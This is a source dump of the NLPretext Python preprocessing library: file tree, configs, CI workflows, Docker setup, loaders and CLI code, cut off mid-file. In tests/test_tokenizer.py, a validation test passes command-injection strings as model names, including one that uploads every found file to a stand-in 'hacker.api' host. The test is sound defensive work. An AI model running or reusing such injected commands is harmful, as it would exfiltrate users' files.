├── nlpretext ├── py.typed ├── cli │ ├── __init__.py │ ├── __main__.py │ └── preprocess.py ├── _utils │ ├── daskloader.py │ ├── __init__.py │ ├── pandasloader.py │ ├── stopwords.py │ ├── file_loader.py │ └── phone_number.py ├── basic │ ├── __init__.py │ └── preprocess.py ├── token │ ├── __init__.py │ ├── preprocess.py │ └── tokenizer.py ├── _config │ ├── __init__.py │ ├── constants.py │ └── config.py ├── social │ ├── __init__.py │ └── preprocess.py ├── augmentation │ ├── __init__.py │ └── text_augmentation.py ├── __init__.py ├── preprocessor.py └── textloader.py ├── tests ├── __init__.py ├── test_tokenizer.py ├── test_phone_number.py ├── test_data_augmentation.py ├── test_file_loader.py └── test_textloader.py ├── references ├── .gitkeep └── logo_nlpretext.png ├── docs ├── source │ ├── _static │ │ └── images │ │ │ └── python_logo.png │ ├── tutorials │ │ ├── index.rst │ │ └── basic_notebook.ipynb │ ├── _templates │ │ ├── module.rst_t │ │ ├── versions.html │ │ └── package.rst_t │ ├── index.rst │ └── conf.py ├── Makefile ├── scripts │ └── buildsite.sh └── make.bat ├── .github ├── CODEOWNERS ├── ISSUE_TEMPLATE │ ├── config.yml │ ├── question.md │ ├── feature_request.md │ └── bug_report.md ├── workflows │ ├── release-drafter.yml │ ├── greetings.yml │ ├── ci.yml │ └── cd.yml ├── .stale.yml ├── release-drafter.yml ├── dependabot.yml └── PULL_REQUEST_TEMPLATE.md ├── .dockerignore ├── .editorconfig ├── docker ├── Dockerfile └── README.md ├── datasets └── external │ ├── get_language_dataset.sh │ └── get_stanfordtweets.sh ├── SECURITY.md ├── .pre-commit-config.yaml ├── CONTRIBUTING.md ├── CODE_OF_CONDUCT.md ├── Makefile ├── pyproject.toml ├── LICENSE ├── .gitignore └── README.md /nlpretext/py.typed: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /references/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /nlpretext/cli/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /references/logo_nlpretext.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/references/logo_nlpretext.png -------------------------------------------------------------------------------- /docs/source/_static/images/python_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/docs/source/_static/images/python_logo.png -------------------------------------------------------------------------------- /.github/CODEOWNERS: -------------------------------------------------------------------------------- 1 | # https://help.github.com/en/articles/about-code-owners 2 | 3 | * @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606 4 | -------------------------------------------------------------------------------- /docs/source/tutorials/index.rst: -------------------------------------------------------------------------------- 1 | Tutorials 2 | ========= 3 | 4 | 5 | .. toctree:: 6 | :maxdepth: 4 7 | :glob: 8 | 9 | basic_notebook 10 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | # Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository 2 | 3 | blank_issues_enabled: false 4 | -------------------------------------------------------------------------------- /docs/source/_templates/module.rst_t: -------------------------------------------------------------------------------- 1 | 2 | {%- if show_headings %} 3 | {{- [basename] | join(' ') | e | heading }} 4 | 5 | {% endif -%} 6 | .. automodule:: {{ qualname }} 7 | {%- for option in automodule_options %} 8 | :{{ option }}: 9 | {%- endfor %} 10 | -------------------------------------------------------------------------------- /.github/workflows/release-drafter.yml: -------------------------------------------------------------------------------- 1 | name: Release Drafter 2 | 3 | on: 4 | push: 5 | # branches to consider in the event; optional, defaults to all 6 | branches: 7 | - main 8 | 9 | jobs: 10 | update_release_draft: 11 | runs-on: ubuntu-latest 12 | steps: 13 | # Drafts your next Release notes as Pull Requests are merged into "main" 14 | - uses: release-drafter/release-drafter@v5.22.0 15 | env: 16 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 17 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | # Git 2 | .git 3 | .gitignore 4 | .github 5 | 6 | # Docker 7 | .dockerignore 8 | docker/ 9 | 10 | # IDE 11 | .idea 12 | .vscode 13 | 14 | # Byte-compiled / optimized / DLL files 15 | __pycache__/ 16 | **/__pycache__/ 17 | *.pyc 18 | *.pyo 19 | *.pyd 20 | .Python 21 | *.py[cod] 22 | *$py.class 23 | .pytest_cache/ 24 | ..mypy_cache/ 25 | 26 | # poetry 27 | .venv 28 | 29 | # C extensions 30 | *.so 31 | 32 | # Virtual environment 33 | .venv 34 | venv 35 | 36 | .DS_Store 37 | .AppleDouble 38 | .LSOverride 39 | ._* 40 | -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | # Check http://editorconfig.org for more information 2 | # This is the main config file for this project: 3 | root = true 4 | 5 | [*] 6 | charset = utf-8 7 | end_of_line = lf 8 | insert_final_newline = true 9 | indent_style = space 10 | indent_size = 2 11 | trim_trailing_whitespace = true 12 | 13 | [*.{py, pyi}] 14 | indent_style = space 15 | indent_size = 4 16 | 17 | [Makefile] 18 | indent_style = tab 19 | 20 | [*.md] 21 | trim_trailing_whitespace = false 22 | 23 | [*.{diff,patch}] 24 | trim_trailing_whitespace = false 25 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/question.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: ❓ Question 3 | about: Ask a question about this project 🎓 4 | title: '' 5 | labels: question 6 | assignees: 7 | --- 8 | 9 | ## Checklist 10 | 11 | 12 | 13 | - [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext}/issues?q=is%3Aissue). 14 | 15 | ## ❓ Question 16 | 17 | 18 | 19 | How can I [...]? 20 | 21 | Is it possible to [...]? 22 | 23 | ## 📎 Additional context 24 | 25 | 26 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: 🚀 Feature request 3 | about: Suggest an idea for this project 🏖 4 | title: '' 5 | labels: enhancement 6 | assignees: 7 | --- 8 | 9 | ## 🚀 Feature Request 10 | 11 | 12 | 13 | ## 🔈 Motivation 14 | 15 | 16 | 17 | ## 🛰 Alternatives 18 | 19 | 20 | 21 | ## 📎 Additional context 22 | 23 | 24 | -------------------------------------------------------------------------------- /docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-slim-buster 2 | 3 | ENV LANG=C.UTF-8 \ 4 | LC_ALL=C.UTF-8 5 | 6 | RUN apt-get update && \ 7 | apt-get install -y --no-install-recommends \ 8 | curl coreutils \ 9 | && rm -rf /var/lib/apt/lists/* 10 | 11 | # Install Poetry 12 | ENV POETRY_VERSION=1.5.1 13 | RUN pip install --upgrade pip 14 | RUN python3 -m pip install "poetry==$POETRY_VERSION" 15 | 16 | WORKDIR /home/workspace 17 | 18 | COPY pyproject.toml ./ 19 | 20 | RUN poetry config virtualenvs.create false \ 21 | && poetry lock \ 22 | && poetry install --no-root --no-dev --no-interaction 23 | 24 | COPY . /home/docker_user/workspace/ 25 | 26 | ENTRYPOINT ["poetry", "run", "nlpretext"] 27 | -------------------------------------------------------------------------------- /nlpretext/cli/__main__.py: -------------------------------------------------------------------------------- 1 | # mypy: disable-error-code="attr-defined" 2 | 3 | import typer 4 | from nlpretext import __version__ 5 | from nlpretext.cli import preprocess 6 | from rich.console import Console 7 | 8 | app = typer.Typer( 9 | name="nlpretext", 10 | help="All the goto functions you need to handle NLP use-cases, integrated in NLPretext", 11 | add_completion=True, 12 | ) 13 | app.add_typer(preprocess.app, name="preprocess") 14 | console = Console() 15 | 16 | 17 | def version_callback(value: bool) -> None: 18 | """Prints the version of the package.""" 19 | if value: 20 | console.print(f"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]") 21 | raise typer.Exit() 22 | -------------------------------------------------------------------------------- /tests/test_tokenizer.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model 3 | 4 | 5 | @pytest.mark.parametrize( 6 | "bad_model_name", 7 | [ 8 | ("en_core_web_sm; chmod -x hacker"), 9 | ( 10 | "fr_core_news_sm | for file in $(find .); " 11 | 'do curl_command -X POST -H "Content-Type: multipart/form-data" ' 12 | '-F "data=@${file}" https-fake://hacker.api/upload; done' 13 | ), 14 | ], 15 | ) 16 | def test_load_spacy_model_validation(bad_model_name): 17 | with pytest.raises(LanguageNotInstalledError) as e: 18 | _load_spacy_model(bad_model_name) 19 | assert bad_model_name in str(e.value) 20 | -------------------------------------------------------------------------------- /.github/.stale.yml: -------------------------------------------------------------------------------- 1 | # Number of days of inactivity before an issue becomes stale 2 | daysUntilStale: 60 3 | # Number of days of inactivity before a stale issue is closed 4 | daysUntilClose: 7 5 | # Issues with these labels will never be considered stale 6 | exemptLabels: 7 | - pinned 8 | - security 9 | # Label to use when marking an issue as stale 10 | staleLabel: wontfix 11 | # Comment to post when marking an issue as stale. Set to `false` to disable 12 | markComment: > 13 | This issue has been automatically marked as stale because it has not had 14 | recent activity. It will be closed if no further activity occurs. Thank you 15 | for your contributions. 16 | # Comment to post when closing a stale issue. Set to `false` to disable 17 | closeComment: false 18 | -------------------------------------------------------------------------------- /nlpretext/_utils/daskloader.py: -------------------------------------------------------------------------------- 1 | # mypy: disable-error-code="attr-defined" 2 | from typing import List, Union 3 | 4 | import dask.bag as db 5 | import dask.dataframe as dd 6 | 7 | 8 | def read_text(files_path: Union[str, List[str]], encoding: str): # type: ignore 9 | return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe() 10 | 11 | 12 | def read_json(files_path: Union[str, List[str]], encoding: str): # type: ignore 13 | return dd.read_json(files_path, encoding=encoding) 14 | 15 | 16 | def read_csv(files_path: Union[str, List[str]], encoding: str): # type: ignore 17 | return dd.read_csv(files_path, encoding=encoding) 18 | 19 | 20 | def read_parquet(files_path: Union[str, List[str]], encoding: str): # type: ignore 21 | return dd.read_parquet(files_path, encoding=encoding) 22 | -------------------------------------------------------------------------------- /.github/workflows/greetings.yml: -------------------------------------------------------------------------------- 1 | name: Greetings 2 | 3 | on: 4 | pull_request: 5 | types: 6 | - opened 7 | - reopened 8 | - edited 9 | - labeled 10 | - unlabeled 11 | - synchronize 12 | issues: 13 | 14 | jobs: 15 | greeting: 16 | runs-on: ubuntu-latest 17 | if: ${{ !contains(github.head_ref, 'dependabot/') }} 18 | steps: 19 | - uses: actions/first-interaction@v1 20 | with: 21 | repo-token: ${{ secrets.GITHUB_TOKEN }} 22 | pr-message: 'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.' 23 | issue-message: | 24 | Hello @${{ github.actor }}, thank you for your interest in our work! 25 | 26 | If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we can not help you. 27 | -------------------------------------------------------------------------------- /nlpretext/basic/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /nlpretext/token/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /.github/release-drafter.yml: -------------------------------------------------------------------------------- 1 | # Release drafter configuration https://github.com/release-drafter/release-drafter#configuration 2 | # Emojis were chosen to match the https://gitmoji.carloscuesta.me/ 3 | 4 | name-template: "$NEXT_PATCH_VERSION" 5 | tag-template: "$NEXT_PATCH_VERSION" 6 | 7 | categories: 8 | - title: ":rocket: Features" 9 | labels: [enhancement, feature] 10 | - title: ":wrench: Fixes & Refactoring" 11 | labels: [bug, refactoring, bugfix, fix] 12 | - title: ":package: Build System & CI/CD" 13 | labels: [build, ci, testing] 14 | - title: ":boom: Breaking Changes" 15 | labels: [breaking] 16 | - title: ":pencil: Documentation" 17 | labels: [documentation] 18 | - title: ":arrow_up: Dependencies updates" 19 | labels: [dependencies] 20 | 21 | template: | 22 | ## What’s Changed 23 | 24 | $CHANGES 25 | 26 | ## :busts_in_silhouette: List of contributors 27 | 28 | $CONTRIBUTORS 29 | -------------------------------------------------------------------------------- /nlpretext/_config/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /nlpretext/_utils/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /nlpretext/social/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /nlpretext/augmentation/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: 🐛 Bug report 3 | about: If something isn't working 🔧 4 | title: '' 5 | labels: bug 6 | assignees: 7 | --- 8 | 9 | ## 🐛 Bug Report 10 | 11 | 12 | 13 | ## 🔬 How To Reproduce 14 | 15 | Steps to reproduce the behavior: 16 | 17 | 1. ... 18 | 19 | ### Code sample 20 | 21 | 22 | 23 | ### Environment 24 | 25 | * OS: [e.g. Linux / Windows / macOS] 26 | * Python version, get it with: 27 | 28 | ```bash 29 | python --version 30 | ``` 31 | 32 | ### Screenshots 33 | 34 | 35 | 36 | ## 📈 Expected behavior 37 | 38 | 39 | 40 | ## 📎 Additional context 41 | 42 | 43 | -------------------------------------------------------------------------------- /docs/source/_templates/versions.html: -------------------------------------------------------------------------------- 1 | 2 | {%- if current_version %} 3 |
4 | 5 | Other Versions 6 | v: {{ current_version.name }} 7 | 8 | 9 |
10 | {%- if versions.tags %} 11 |
12 |
Tags
13 | {%- for item in versions.tags %} 14 |
{{ item.name }}
15 | {%- endfor %} 16 |
17 | {%- endif %} 18 | {%- if versions.branches %} 19 |
20 |
Branches
21 | {%- for item in versions.branches %} 22 |
{{ item.name }}
23 | {%- endfor %} 24 |
25 | {%- endif %} 26 |
27 |
28 | {%- endif %} 29 | -------------------------------------------------------------------------------- /docs/source/index.rst: -------------------------------------------------------------------------------- 1 | ========= 2 | NLPretext 3 | ========= 4 | 5 | 6 | Welcome to NLPretext's documentation! 7 | ======================================== 8 | 9 | The NLPretext library aimed to be a meta-library to be used to help you get started on handling your NLP use-case preprocessing. 10 | 11 | 12 | # Installation 13 | 14 | Beware, this package has been tested on Python `3.8`, `3.9` & `3.10` and will probably not be working under python **2.7** as **Python2.7** EOL is scheduled for December 2019. 15 | 16 | To install this library you should first clone the repository: 17 | 18 | pip install nlpretext 19 | 20 | 21 | .. toctree:: 22 | :maxdepth: 4 23 | :caption: Tutorials: 24 | 25 | ./tutorials/index 26 | 27 | .. toctree:: 28 | :maxdepth: 2 29 | :caption: API Reference: 30 | 31 | ./apidoc/modules 32 | 33 | Indices and tables 34 | ================== 35 | 36 | * :ref:`genindex` 37 | * :ref:`modindex` 38 | * :ref:`search` 39 | -------------------------------------------------------------------------------- /docker/README.md: -------------------------------------------------------------------------------- 1 | # Docker for nlpretext 2 | 3 | ## Installation 4 | 5 | To create Docker you need to run: 6 | 7 | ```bash 8 | make docker 9 | ``` 10 | 11 | which is equivalent to: 12 | 13 | ```bash 14 | make docker VERSION=latest 15 | ``` 16 | 17 | You could also provide name and version for the image itself. 18 | Default name is `IMAGE := nlpretext`. 19 | Default version is `VERSION := latest`. 20 | 21 | ```bash 22 | make docker IMAGE=some_name VERSION=1.0.4 23 | ``` 24 | 25 | ## Usage 26 | 27 | ```bash 28 | docker run -it --rm \ 29 | -v $(pwd):/workspace \ 30 | nlpretext bash 31 | ``` 32 | 33 | ## How to clean up 34 | 35 | To uninstall docker image run `make clean_docker` with `VERSION`: 36 | 37 | ```bash 38 | make clean_docker VERSION=1.0.4 39 | ``` 40 | 41 | like in installation, you can also choose the image name 42 | 43 | ```bash 44 | make clean_docker IMAGE=some_name VERSION=latest 45 | ``` 46 | 47 | If you want to clean all, including `build` run `make clean` 48 | -------------------------------------------------------------------------------- /docs/Makefile: -------------------------------------------------------------------------------- 1 | # Minimal makefile for Sphinx documentation 2 | # 3 | 4 | # You can set these variables from the command line, and also 5 | # from the environment for the first two. 6 | SPHINXOPTS ?= 7 | SPHINXBUILD ?= poetry run sphinx-build 8 | SPHINXAPIBUILD ?= poetry run sphinx-apidoc 9 | SPHINXMULTIVERSION ?= poetry run sphinx-multiversion 10 | SOURCEDIR = source 11 | BUILDDIR = build 12 | 13 | # Put it first so that "make" without argument is like "make help". 14 | .PHONY: help Makefile 15 | help: 16 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) 17 | 18 | multiversion: 19 | @$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html 20 | 21 | apidoc: 22 | @$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates 23 | 24 | # Catch-all target: route all unknown targets to Sphinx using the new 25 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). 26 | %: Makefile 27 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) 28 | -------------------------------------------------------------------------------- /datasets/external/get_language_dataset.sh: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | #!/bin/bash 19 | wget -O wili.zip https://zenodo.org/record/841984/files/wili-2018.zip?download=1 20 | mkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd .. 21 | -------------------------------------------------------------------------------- /datasets/external/get_stanfordtweets.sh: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | #!/bin/bash 19 | wget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip trainingandtestdata.zip 20 | mkdir -p tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip 21 | -------------------------------------------------------------------------------- /nlpretext/_utils/pandasloader.py: -------------------------------------------------------------------------------- 1 | from typing import List, Union 2 | 3 | import pandas as pd 4 | from fsspec import open_files 5 | 6 | 7 | def _list_handler(func): 8 | def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame: # type: ignore 9 | list_files = open_files(file_path) 10 | list_df = [func(file.path, *args, **kwargs) for file in list_files] 11 | df = pd.concat(list_df) 12 | return df 13 | 14 | return wrapper_list_handler 15 | 16 | 17 | @_list_handler 18 | def read_text(file_path: str, encoding: str) -> pd.DataFrame: 19 | df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)]) 20 | return df 21 | 22 | 23 | @_list_handler 24 | def read_json(file_path: str, encoding: str) -> pd.DataFrame: 25 | df = pd.read_json(file_path, encoding=encoding) 26 | return df 27 | 28 | 29 | @_list_handler 30 | def read_csv(file_path: str, encoding: str) -> pd.DataFrame: 31 | df = pd.read_csv(file_path, encoding=encoding) 32 | return df 33 | 34 | 35 | @_list_handler 36 | def read_parquet(file_path: str, encoding: str) -> pd.DataFrame: 37 | df = pd.read_parquet(file_path, encoding=encoding) 38 | return df 39 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | # Configuration: https://dependabot.com/docs/config-file/ 2 | # Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically 3 | 4 | version: 2 5 | 6 | updates: 7 | - package-ecosystem: "pip" 8 | directory: "/" 9 | schedule: 10 | interval: "weekly" 11 | day: "monday" 12 | time: "09:00" 13 | allow: 14 | - dependency-type: "all" 15 | ignore: 16 | - dependency-name: "*" 17 | update-types: ["version-update:semver-patch"] 18 | labels: 19 | - draft 20 | - dependencies 21 | - python 22 | - package-ecosystem: "github-actions" 23 | directory: "/" 24 | schedule: 25 | interval: "weekly" 26 | day: "monday" 27 | time: "09:00" 28 | allow: 29 | - dependency-type: "all" 30 | labels: 31 | - draft 32 | - dependencies 33 | - github_actions 34 | - package-ecosystem: "docker" 35 | directory: "/docker/" 36 | schedule: 37 | interval: "weekly" 38 | day: "monday" 39 | time: "09:00" 40 | allow: 41 | - dependency-type: "all" 42 | labels: 43 | - draft 44 | - dependencies 45 | - docker 46 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security 2 | 3 | ## 🔐 Reporting Security Issues 4 | 5 | > Do not open issues that might have security implications! 6 | > It is critical that security related issues are reported privately so we have time to address them before they become public knowledge. 7 | 8 | Vulnerabilities can be reported by emailing core members: 9 | 10 | - artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com) 11 | 12 | Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue: 13 | 14 | - Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.) 15 | - Full paths of source file(s) related to the manifestation of the issue 16 | - The location of the affected source code (tag/branch/commit or direct URL) 17 | - Any special configuration required to reproduce the issue 18 | - Environment (e.g. Linux / Windows / macOS) 19 | - Step-by-step instructions to reproduce the issue 20 | - Proof-of-concept or exploit code (if possible) 21 | - Impact of the issue, including how an attacker might exploit the issue 22 | 23 | This information will help us triage your report more quickly. 24 | 25 | ## Preferred Languages 26 | 27 | We prefer all communications to be in English. 28 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | 4 | 5 | ## Related Issue 6 | 7 | 8 | 9 | ## Type of Change 10 | 11 | 12 | 13 | - [ ] 📚 Examples / docs / tutorials / dependencies update 14 | - [ ] 🔧 Bug fix (non-breaking change which fixes an issue) 15 | - [ ] 🥂 Improvement (non-breaking change which improves an existing feature) 16 | - [ ] 🚀 New feature (non-breaking change which adds functionality) 17 | - [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change) 18 | - [ ] 🔐 Security fix 19 | 20 | ## Checklist 21 | 22 | 23 | 24 | - [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext}/blob/main/CODE_OF_CONDUCT.md) document. 25 | - [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext}/blob/main/CONTRIBUTING.md) guide. 26 | - [ ] I've updated the code style using `make format-code`. 27 | - [ ] I've written tests for all new methods and classes that I created. 28 | - [ ] I've written the docstring in Google format for all the methods and classes that I used. 29 | -------------------------------------------------------------------------------- /docs/source/_templates/package.rst_t: -------------------------------------------------------------------------------- 1 | 2 | {%- macro automodule(modname, options) -%} 3 | .. automodule:: {{ modname }} 4 | {%- for option in options %} 5 | :{{ option }}: 6 | {%- endfor %} 7 | {%- endmacro %} 8 | 9 | {%- macro toctree(docnames) -%} 10 | .. toctree:: 11 | :maxdepth: {{ maxdepth }} 12 | {% for docname in docnames %} 13 | {{ docname }} 14 | {%- endfor %} 15 | {%- endmacro %} 16 | 17 | {%- if is_namespace %} 18 | {{- ["**", pkgname, "**"] | join("") | heading }} 19 | {% else %} 20 | {% set pkg_list = pkgname.split('.') %} 21 | {{- ["**", pkg_list[-1], "**"] | join("") | heading }} 22 | {% endif %} 23 | 24 | {%- if modulefirst and not is_namespace %} 25 | {{ automodule(pkgname, automodule_options) }} 26 | {% endif %} 27 | 28 | {%- if subpackages %} 29 | 30 | {{ toctree(subpackages) }} 31 | {% endif %} 32 | 33 | {%- if submodules %} 34 | {% if separatemodules %} 35 | {{ toctree(submodules) }} 36 | {% else %} 37 | {%- for submodule in submodules %} 38 | {% if show_headings %} 39 | {% set submodule_list = submodule.split('.') %} 40 | {{- [submodule_list[-1]] | join(" ") | e | heading(2) }} 41 | {% endif %} 42 | {{ automodule(submodule, automodule_options) }} 43 | {% endfor %} 44 | {%- endif %} 45 | {%- endif %} 46 | 47 | {%- if not modulefirst and not is_namespace %} 48 | 49 | {{ automodule(pkgname, automodule_options) }} 50 | {% endif %} 51 | -------------------------------------------------------------------------------- /nlpretext/cli/preprocess.py: -------------------------------------------------------------------------------- 1 | from typing import List 2 | 3 | import typer 4 | from nlpretext.preprocessor import Preprocessor 5 | from nlpretext.textloader import TextLoader 6 | from rich.console import Console 7 | 8 | app = typer.Typer() 9 | console = Console() 10 | 11 | 12 | @app.command() 13 | 